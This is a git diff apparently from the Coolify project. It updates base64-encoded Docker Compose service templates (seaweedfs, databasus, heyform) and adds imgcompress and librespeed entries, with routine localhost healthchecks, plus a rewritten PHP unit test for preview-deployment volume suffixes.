+        "compose": "c2VydmljZXM6CiAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfUzNfODMzMwogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke1NFUlZJQ0VfVVNFUl9TM30nCiAgICAgIC0gJ0FXU19TRUNSRVRfQUNDRVNTX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfUzN9JwogICAgdm9sdW1lczoKICAgICAgLSAnc2Vhd2VlZGZzLXMzLWRhdGE6L2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2Jhc2UtY29uZmlnLmpzb24KICAgICAgICB0YXJnZXQ6IC9iYXNlLWNvbmZpZy5qc29uCiAgICAgICAgY29udGVudDogIntcbiAgXCJpZGVudGl0aWVzXCI6IFtcbiAgICB7XG4gICAgICBcIm5hbWVcIjogXCJhbm9ueW1vdXNcIixcbiAgICAgIFwiYWN0aW9uc1wiOiBbXG4gICAgICAgIFwiUmVhZFwiXG4gICAgICBdXG4gICAgfSxcbiAgICB7XG4gICAgICBcIm5hbWVcIjogXCJhZG1pblwiLFxuICAgICAgXCJjcmVkZW50aWFsc1wiOiBbXG4gICAgICAgIHtcbiAgICAgICAgICBcImFjY2Vzc0tleVwiOiBcImVudjpBV1NfQUNDRVNTX0tFWV9JRFwiLFxuICAgICAgICAgIFwic2VjcmV0S2V5XCI6IFwiZW52OkFXU19TRUNSRVRfQUNDRVNTX0tFWVwiXG4gICAgICAgIH1cbiAgICAgIF0sXG4gICAgICBcImFjdGlvbnNcIjogW1xuICAgICAgICBcIkFkbWluXCIsXG4gICAgICAgIFwiUmVhZFwiLFxuICAgICAgICBcIlJlYWRBY3BcIixcbiAgICAgICAgXCJMaXN0XCIsXG4gICAgICAgIFwiVGFnZ2luZ1wiLFxuICAgICAgICBcIldyaXRlXCIsXG4gICAgICAgIFwiV3JpdGVBY3BcIlxuICAgICAgXVxuICAgIH1cbiAgXVxufVxuIgogICAgZW50cnlwb2ludDogInNoIC1jICdcXFxuc2VkIFwicy9lbnY6QVdTX0FDQ0VTU19LRVlfSUQvJEFXU19BQ0NFU1NfS0VZX0lEL2dcIiAvYmFzZS1jb25maWcuanNvbiA+IC9iYXNlMS1jb25maWcuanNvbjsgXFxcbnNlZCBcInMvZW52OkFXU19TRUNSRVRfQUNDRVNTX0tFWS8kQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZL2dcIiAvYmFzZTEtY29uZmlnLmpzb24gPiAvY29uZmlnLmpzb247IFxcXG53ZWVkIHNlcnZlciAtZGlyPS9kYXRhIC1tYXN0ZXIucG9ydD05MzMzIC1zMyAtczMucG9ydD04MzMzIC1zMy5jb25maWc9L2NvbmZpZy5qc29uXFxcbidcbiIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtLXNwaWRlciAtcSBodHRwOi8vMC4wLjAuMDo4MzMzOyBbICQkPyAtbGUgOCBdJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgc2Vhd2VlZGZzLWFkbWluOgogICAgaW1hZ2U6ICdjaHJpc2x1c2Yvc2Vhd2VlZGZzOjQuMTMnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9BRE1JTl8yMzY0NgogICAgICAtICdTRUFXRUVEX1VTRVJfQURNSU49JHtTRVJWSUNFX1VTRVJfQURNSU59JwogICAgICAtICdTRUFXRUVEX1BBU1NXT1JEX0FETUlOPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICBjb21tYW5kOgogICAgICAtIGFkbWluCiAgICAgIC0gJy1tYXN0ZXI9c2Vhd2VlZGZzLW1hc3Rlcjo5MzMzJwogICAgICAtICctYWRtaW5Vc2VyPSR7U0VBV0VFRF9VU0VSX0FETUlOfScKICAgICAgLSAnLWFkbWluUGFzc3dvcmQ9JHtTRUFXRUVEX1BBU1NXT1JEX0FETUlOfScKICAgICAgLSAnLXBvcnQ9MjM2NDYnCiAgICAgIC0gJy1kYXRhRGlyPS9kYXRhJwogICAgdm9sdW1lczoKICAgICAgLSAnc2Vhd2VlZGZzLWFkbWluLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovLzAuMC4wLjA6MjM2NDY7IFsgJCQ/IC1sZSA4IF0nCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHNlYXdlZWRmcy1tYXN0ZXI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkK",
         "tags": [
             "object",
             "storage",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 49f1f126f..22d0d6d8c 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -818,7 +818,7 @@
     "databasus": {
         "documentation": "https://databasus.com/installation?utm_source=coolify.io",
         "slogan": "Databasus is a free, open source and self-hosted tool to backup PostgreSQL, MySQL, and MongoDB.",
-        "compose": "c2VydmljZXM6CiAgZGF0YWJhc3VzOgogICAgaW1hZ2U6ICdkYXRhYmFzdXMvZGF0YWJhc3VzOnYyLjE4LjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fREFUQUJBU1VTXzQwMDUKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RhdGFiYXN1cy1kYXRhOi9kYXRhYmFzdXMtZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXFPLScKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjQwMDUvYXBpL3YxL3N5c3RlbS9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQo=",
+        "compose": "c2VydmljZXM6CiAgZGF0YWJhc3VzOgogICAgaW1hZ2U6ICdkYXRhYmFzdXMvZGF0YWJhc3VzOnYzLjE2LjInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fREFUQUJBU1VTXzQwMDUKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RhdGFiYXN1cy1kYXRhOi9kYXRhYmFzdXMtZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXFPLScKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjQwMDUvYXBpL3YxL3N5c3RlbS9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "postgres",
             "mysql",
@@ -1951,7 +1951,7 @@
     "heyform": {
         "documentation": "https://docs.heyform.net/open-source/self-hosting?utm_source=coolify.io",
         "slogan": "Allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls. No coding skills required.",
-        "compose": "c2VydmljZXM6CiAgaGV5Zm9ybToKICAgIGltYWdlOiAnaGV5Zm9ybS9jb21tdW5pdHktZWRpdGlvbjpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWFzc2V0czovYXBwL3N0YXRpYy91cGxvYWQnCiAgICBkZXBlbmRzX29uOgogICAgICBtb25nbzoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBrZXlkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0hFWUZPUk1fODAwMAogICAgICAtICdBUFBfSE9NRVBBR0VfVVJMPSR7U0VSVklDRV9GUUROX0hFWUZPUk19JwogICAgICAtICdTRVNTSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X1NFU1NJT059JwogICAgICAtICdGT1JNX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9CQVNFNjRfNjRfRk9STX0nCiAgICAgIC0gJ01PTkdPX1VSST1tb25nb2RiOi8vbW9uZ286MjcwMTcvaGV5Zm9ybScKICAgICAgLSBSRURJU19IT1NUPWtleWRiCiAgICAgIC0gUkVESVNfUE9SVD02Mzc5CiAgICAgIC0gJ1JFRElTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjgwMDAgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMwogIG1vbmdvOgogICAgaW1hZ2U6ICdwZXJjb25hL3BlcmNvbmEtc2VydmVyLW1vbmdvZGI6bGF0ZXN0JwogICAgdm9sdW1lczoKICAgICAgLSAnaGV5Zm9ybS1tb25nby1kYXRhOi9kYXRhL2RiJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICJlY2hvICdvaycgPiAvZGV2L251bGwgMj4mMSIKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMKICBrZXlkYjoKICAgIGltYWdlOiAnZXFhbHBoYS9rZXlkYjpsYXRlc3QnCiAgICBjb21tYW5kOiAna2V5ZGItc2VydmVyIC0tYXBwZW5kb25seSB5ZXMnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnS0VZREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0tFWURCfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hleWZvcm0ta2V5ZGItZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSBrZXlkYi1jbGkKICAgICAgICAtICctLXBhc3MnCiAgICAgICAgLSAnJHtTRVJWSUNFX1BBU1NXT1JEX0tFWURCfScKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMK",
+        "compose": "c2VydmljZXM6CiAgaGV5Zm9ybToKICAgIGltYWdlOiAnaGV5Zm9ybS9jb21tdW5pdHktZWRpdGlvbjpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWFzc2V0czovYXBwL3N0YXRpYy91cGxvYWQnCiAgICBkZXBlbmRzX29uOgogICAgICBtb25nbzoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBrZXlkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0hFWUZPUk1fOTE1NwogICAgICAtICdBUFBfSE9NRVBBR0VfVVJMPSR7U0VSVklDRV9GUUROX0hFWUZPUk19JwogICAgICAtICdTRVNTSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X1NFU1NJT059JwogICAgICAtICdGT1JNX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9CQVNFNjRfNjRfRk9STX0nCiAgICAgIC0gJ01PTkdPX1VSST1tb25nb2RiOi8vbW9uZ286MjcwMTcvaGV5Zm9ybScKICAgICAgLSBSRURJU19IT1NUPWtleWRiCiAgICAgIC0gUkVESVNfUE9SVD02Mzc5CiAgICAgIC0gJ1JFRElTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjkxNTcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMwogIG1vbmdvOgogICAgaW1hZ2U6ICdwZXJjb25hL3BlcmNvbmEtc2VydmVyLW1vbmdvZGI6bGF0ZXN0JwogICAgdm9sdW1lczoKICAgICAgLSAnaGV5Zm9ybS1tb25nby1kYXRhOi9kYXRhL2RiJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICJlY2hvICdvaycgPiAvZGV2L251bGwgMj4mMSIKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMKICBrZXlkYjoKICAgIGltYWdlOiAnZXFhbHBoYS9rZXlkYjpsYXRlc3QnCiAgICBjb21tYW5kOiAna2V5ZGItc2VydmVyIC0tYXBwZW5kb25seSB5ZXMnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnS0VZREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0tFWURCfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hleWZvcm0ta2V5ZGItZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSBrZXlkYi1jbGkKICAgICAgICAtICctLXBhc3MnCiAgICAgICAgLSAnJHtTRVJWSUNFX1BBU1NXT1JEX0tFWURCfScKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMK",
         "tags": [
             "form",
             "builder",
@@ -1965,7 +1965,7 @@
         "category": "productivity",
         "logo": "svgs/heyform.svg",
         "minversion": "0.0.0",
-        "port": "8000"
+        "port": "9157"
     },
     "homarr": {
         "documentation": "https://homarr.dev?utm_source=coolify.io",
@@ -2041,6 +2041,21 @@
         "minversion": "0.0.0",
         "port": "80"
     },
+    "imgcompress": {
+        "documentation": "https://imgcompress.karimzouine.com?utm_source=coolify.io",
+        "slogan": "Offline image compression, conversion, and AI background removal for Docker homelabs.",
+        "compose": "c2VydmljZXM6CiAgaW1nY29tcHJlc3M6CiAgICBpbWFnZTogJ2thcmltejEvaW1nY29tcHJlc3M6MC42LjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fSU1HQ09NUFJFU1NfNTAwMAogICAgICAtICdESVNBQkxFX0xPR089JHtESVNBQkxFX0xPR086LWZhbHNlfScKICAgICAgLSAnRElTQUJMRV9TVE9SQUdFX01BTkFHRU1FTlQ9JHtESVNBQkxFX1NUT1JBR0VfTUFOQUdFTUVOVDotZmFsc2V9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjUwMDAnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMK",
+        "tags": [
+            "compress",
+            "photo",
+            "server",
+            "metadata"
+        ],
+        "category": "media",
+        "logo": "svgs/imgcompress.png",
+        "minversion": "0.0.0",
+        "port": "5000"
+    },
     "immich": {
         "documentation": "https://immich.app/docs/overview/introduction?utm_source=coolify.io",
         "slogan": "Self-hosted photo and video management solution.",
@@ -2417,6 +2432,19 @@
         "minversion": "0.0.0",
         "port": "3000"
     },
+    "librespeed": {
+        "documentation": "https://github.com/librespeed/speedtest?utm_source=coolify.io",
+        "slogan": "Self-hosted lightweight Speed Test.",
+        "compose": "c2VydmljZXM6CiAgbGlicmVzcGVlZDoKICAgIGNvbnRhaW5lcl9uYW1lOiBsaWJyZXNwZWVkCiAgICBpbWFnZTogJ2doY3IuaW8vbGlicmVzcGVlZC9zcGVlZHRlc3Q6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0xJQlJFU1BFRURfODIKICAgICAgLSBNT0RFPXN0YW5kYWxvbmUKICAgICAgLSBURUxFTUVUUlk9ZmFsc2UKICAgICAgLSBESVNUQU5DRT1rbQogICAgICAtIFdFQlBPUlQ9ODIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnY3VybCAxMjcuMC4wLjE6ODIgfHwgZXhpdCAxJwogICAgICB0aW1lb3V0OiAxcwogICAgICBpbnRlcnZhbDogMW0wcwogICAgICByZXRyaWVzOiAxCg==",
+        "tags": [
+            "speedtest",
+            "internet-speed"
+        ],
+        "category": "devtools",
+        "logo": "svgs/librespeed.png",
+        "minversion": "0.0.0",
+        "port": "82"
+    },
     "libretranslate": {
         "documentation": "https://libretranslate.com/docs/?utm_source=coolify.io",
         "slogan": "Free and open-source machine translation API, entirely self-hosted.",
@@ -4099,7 +4127,7 @@
     "seaweedfs": {
         "documentation": "https://github.com/seaweedfs/seaweedfs?utm_source=coolify.io",
         "slogan": "SeaweedFS is a simple and highly scalable distributed file system. Compatible with S3, with an admin web interface.",
-        "compose": "c2VydmljZXM6CiAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjA1JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX1MzXzgzMzMKICAgICAgLSAnQVdTX0FDQ0VTU19LRVlfSUQ9JHtTRVJWSUNFX1VTRVJfUzN9JwogICAgICAtICdBV1NfU0VDUkVUX0FDQ0VTU19LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX1MzfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3NlYXdlZWRmcy1zMy1kYXRhOi9kYXRhJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9iYXNlLWNvbmZpZy5qc29uCiAgICAgICAgdGFyZ2V0OiAvYmFzZS1jb25maWcuanNvbgogICAgICAgIGNvbnRlbnQ6ICJ7XG4gIFwiaWRlbnRpdGllc1wiOiBbXG4gICAge1xuICAgICAgXCJuYW1lXCI6IFwiYW5vbnltb3VzXCIsXG4gICAgICBcImFjdGlvbnNcIjogW1xuICAgICAgICBcIlJlYWRcIlxuICAgICAgXVxuICAgIH0sXG4gICAge1xuICAgICAgXCJuYW1lXCI6IFwiYWRtaW5cIixcbiAgICAgIFwiY3JlZGVudGlhbHNcIjogW1xuICAgICAgICB7XG4gICAgICAgICAgXCJhY2Nlc3NLZXlcIjogXCJlbnY6QVdTX0FDQ0VTU19LRVlfSURcIixcbiAgICAgICAgICBcInNlY3JldEtleVwiOiBcImVudjpBV1NfU0VDUkVUX0FDQ0VTU19LRVlcIlxuICAgICAgICB9XG4gICAgICBdLFxuICAgICAgXCJhY3Rpb25zXCI6IFtcbiAgICAgICAgXCJBZG1pblwiLFxuICAgICAgICBcIlJlYWRcIixcbiAgICAgICAgXCJSZWFkQWNwXCIsXG4gICAgICAgIFwiTGlzdFwiLFxuICAgICAgICBcIlRhZ2dpbmdcIixcbiAgICAgICAgXCJXcml0ZVwiLFxuICAgICAgICBcIldyaXRlQWNwXCJcbiAgICAgIF1cbiAgICB9XG4gIF1cbn1cbiIKICAgIGVudHJ5cG9pbnQ6ICJzaCAtYyAnXFxcbnNlZCBcInMvZW52OkFXU19BQ0NFU1NfS0VZX0lELyRBV1NfQUNDRVNTX0tFWV9JRC9nXCIgL2Jhc2UtY29uZmlnLmpzb24gPiAvYmFzZTEtY29uZmlnLmpzb247IFxcXG5zZWQgXCJzL2VudjpBV1NfU0VDUkVUX0FDQ0VTU19LRVkvJEFXU19TRUNSRVRfQUNDRVNTX0tFWS9nXCIgL2Jhc2UxLWNvbmZpZy5qc29uID4gL2NvbmZpZy5qc29uOyBcXFxud2VlZCBzZXJ2ZXIgLWRpcj0vZGF0YSAtbWFzdGVyLnBvcnQ9OTMzMyAtczMgLXMzLnBvcnQ9ODMzMyAtczMuY29uZmlnPS9jb25maWcuanNvblxcXG4nXG4iCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovLzAuMC4wLjA6ODMzMzsgWyAkJD8gLWxlIDggXScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHNlYXdlZWRmcy1hZG1pbjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjA1JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0FETUlOXzIzNjQ2CiAgICAgIC0gJ1NFQVdFRURfVVNFUl9BRE1JTj0ke1NFUlZJQ0VfVVNFUl9BRE1JTn0nCiAgICAgIC0gJ1NFQVdFRURfUEFTU1dPUkRfQURNSU49JHtTRVJWSUNFX1BBU1NXT1JEX0FETUlOfScKICAgIGNvbW1hbmQ6CiAgICAgIC0gYWRtaW4KICAgICAgLSAnLW1hc3Rlcj1zZWF3ZWVkZnMtbWFzdGVyOjkzMzMnCiAgICAgIC0gJy1hZG1pblVzZXI9JHtTRUFXRUVEX1VTRVJfQURNSU59JwogICAgICAtICctYWRtaW5QYXNzd29yZD0ke1NFQVdFRURfUEFTU1dPUkRfQURNSU59JwogICAgICAtICctcG9ydD0yMzY0NicKICAgICAgLSAnLWRhdGFEaXI9L2RhdGEnCiAgICB2b2x1bWVzOgogICAgICAtICdzZWF3ZWVkZnMtYWRtaW4tZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtLXNwaWRlciAtcSBodHRwOi8vMC4wLjAuMDoyMzY0NjsgWyAkJD8gLWxlIDggXScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQo=",
+        "compose": "c2VydmljZXM6CiAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX1MzXzgzMzMKICAgICAgLSAnQVdTX0FDQ0VTU19LRVlfSUQ9JHtTRVJWSUNFX1VTRVJfUzN9JwogICAgICAtICdBV1NfU0VDUkVUX0FDQ0VTU19LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX1MzfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3NlYXdlZWRmcy1zMy1kYXRhOi9kYXRhJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9iYXNlLWNvbmZpZy5qc29uCiAgICAgICAgdGFyZ2V0OiAvYmFzZS1jb25maWcuanNvbgogICAgICAgIGNvbnRlbnQ6ICJ7XG4gIFwiaWRlbnRpdGllc1wiOiBbXG4gICAge1xuICAgICAgXCJuYW1lXCI6IFwiYW5vbnltb3VzXCIsXG4gICAgICBcImFjdGlvbnNcIjogW1xuICAgICAgICBcIlJlYWRcIlxuICAgICAgXVxuICAgIH0sXG4gICAge1xuICAgICAgXCJuYW1lXCI6IFwiYWRtaW5cIixcbiAgICAgIFwiY3JlZGVudGlhbHNcIjogW1xuICAgICAgICB7XG4gICAgICAgICAgXCJhY2Nlc3NLZXlcIjogXCJlbnY6QVdTX0FDQ0VTU19LRVlfSURcIixcbiAgICAgICAgICBcInNlY3JldEtleVwiOiBcImVudjpBV1NfU0VDUkVUX0FDQ0VTU19LRVlcIlxuICAgICAgICB9XG4gICAgICBdLFxuICAgICAgXCJhY3Rpb25zXCI6IFtcbiAgICAgICAgXCJBZG1pblwiLFxuICAgICAgICBcIlJlYWRcIixcbiAgICAgICAgXCJSZWFkQWNwXCIsXG4gICAgICAgIFwiTGlzdFwiLFxuICAgICAgICBcIlRhZ2dpbmdcIixcbiAgICAgICAgXCJXcml0ZVwiLFxuICAgICAgICBcIldyaXRlQWNwXCJcbiAgICAgIF1cbiAgICB9XG4gIF1cbn1cbiIKICAgIGVudHJ5cG9pbnQ6ICJzaCAtYyAnXFxcbnNlZCBcInMvZW52OkFXU19BQ0NFU1NfS0VZX0lELyRBV1NfQUNDRVNTX0tFWV9JRC9nXCIgL2Jhc2UtY29uZmlnLmpzb24gPiAvYmFzZTEtY29uZmlnLmpzb247IFxcXG5zZWQgXCJzL2VudjpBV1NfU0VDUkVUX0FDQ0VTU19LRVkvJEFXU19TRUNSRVRfQUNDRVNTX0tFWS9nXCIgL2Jhc2UxLWNvbmZpZy5qc29uID4gL2NvbmZpZy5qc29uOyBcXFxud2VlZCBzZXJ2ZXIgLWRpcj0vZGF0YSAtbWFzdGVyLnBvcnQ9OTMzMyAtczMgLXMzLnBvcnQ9ODMzMyAtczMuY29uZmlnPS9jb25maWcuanNvblxcXG4nXG4iCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovLzAuMC4wLjA6ODMzMzsgWyAkJD8gLWxlIDggXScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHNlYXdlZWRmcy1hZG1pbjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0FETUlOXzIzNjQ2CiAgICAgIC0gJ1NFQVdFRURfVVNFUl9BRE1JTj0ke1NFUlZJQ0VfVVNFUl9BRE1JTn0nCiAgICAgIC0gJ1NFQVdFRURfUEFTU1dPUkRfQURNSU49JHtTRVJWSUNFX1BBU1NXT1JEX0FETUlOfScKICAgIGNvbW1hbmQ6CiAgICAgIC0gYWRtaW4KICAgICAgLSAnLW1hc3Rlcj1zZWF3ZWVkZnMtbWFzdGVyOjkzMzMnCiAgICAgIC0gJy1hZG1pblVzZXI9JHtTRUFXRUVEX1VTRVJfQURNSU59JwogICAgICAtICctYWRtaW5QYXNzd29yZD0ke1NFQVdFRURfUEFTU1dPUkRfQURNSU59JwogICAgICAtICctcG9ydD0yMzY0NicKICAgICAgLSAnLWRhdGFEaXI9L2RhdGEnCiAgICB2b2x1bWVzOgogICAgICAtICdzZWF3ZWVkZnMtYWRtaW4tZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtLXNwaWRlciAtcSBodHRwOi8vMC4wLjAuMDoyMzY0NjsgWyAkJD8gLWxlIDggXScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQo=",
         "tags": [
             "object",
             "storage",
diff --git a/tests/Unit/PreviewDeploymentBindMountTest.php b/tests/Unit/PreviewDeploymentBindMountTest.php
index 367770b08..0bf23e4e3 100644
--- a/tests/Unit/PreviewDeploymentBindMountTest.php
+++ b/tests/Unit/PreviewDeploymentBindMountTest.php
@@ -3,107 +3,174 @@
 /**
  * Tests for GitHub issue #7802: volume mappings from repo content in Preview Deployments.
  *
- * Bind mount volumes use a per-volume `is_preview_suffix_enabled` setting to control
- * whether the -pr-N suffix is applied during preview deployments.
- * When enabled (default), the suffix is applied for data isolation.
- * When disabled, the volume path is shared with the main deployment.
- * Named Docker volumes also respect this setting.
+ * Behavioral tests for addPreviewDeploymentSuffix and related helper functions.
+ *
+ * Note: The parser functions (applicationParser, serviceParser) and
+ * ApplicationDeploymentJob methods require database-persisted models with
+ * relationships (Application->destination->server, etc.), making them
+ * unsuitable for unit tests. Integration tests for those paths belong
+ * in tests/Feature/.
  */
-it('uses is_preview_suffix_enabled setting for bind mount suffix in preview deployments', function () {
-    $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+describe('addPreviewDeploymentSuffix', function () {
+    it('appends -pr-N suffix for non-zero pull request id', function () {
+        expect(addPreviewDeploymentSuffix('myvolume', 3))->toBe('myvolume-pr-3');
+    });
